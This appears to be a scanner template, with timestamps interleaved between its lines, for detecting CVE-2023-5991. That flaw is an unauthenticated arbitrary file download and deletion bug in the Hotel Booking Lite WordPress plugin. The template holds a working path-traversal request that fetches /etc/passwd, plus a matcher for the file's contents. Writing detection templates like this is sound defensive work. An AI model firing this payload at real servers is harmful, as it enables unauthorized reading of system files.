2024-05-14 10:34:23 +00:00
id : CVE-2023-5991
info :
2024-05-14 10:54:36 +00:00
name : Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion
2024-05-14 10:34:23 +00:00
author : Kazgangap
severity : critical
description : |
The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server
2024-05-14 12:37:52 +00:00
remediation : Fixed in 4.8.5
2024-05-14 10:34:23 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2023-5991
- https://wpscan.com/vulnerability/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e/
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-5991
cwe-id : CWE-22
epss-score : 0.00603
2024-05-14 12:37:52 +00:00
epss-percentile : 0.78412
2024-05-14 10:34:23 +00:00
cpe : cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:*
metadata :
2024-05-14 12:37:52 +00:00
verified : true
max-request : 1
2024-05-14 10:34:23 +00:00
vendor : motopress
product : hotel_booking_lite
framework : wordpress
2024-05-14 12:37:52 +00:00
publicwww-query : "/wp-content/plugins/motopress-hotel-booking"
tags : cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp
2024-05-14 10:34:23 +00:00
http :
- method : GET
2024-05-14 10:54:36 +00:00
path :
- "{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download"
2024-05-14 10:34:23 +00:00
matchers-condition : and
matchers :
- type : regex
2024-05-14 12:37:52 +00:00
part : body
2024-05-14 10:34:23 +00:00
regex :
- "root:.*:0:0:"
- type : status
status :
2024-05-14 10:54:36 +00:00
- 200
